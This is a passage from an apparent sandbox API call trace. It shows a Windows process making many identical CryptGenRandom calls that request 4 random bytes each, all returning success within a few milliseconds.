dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] 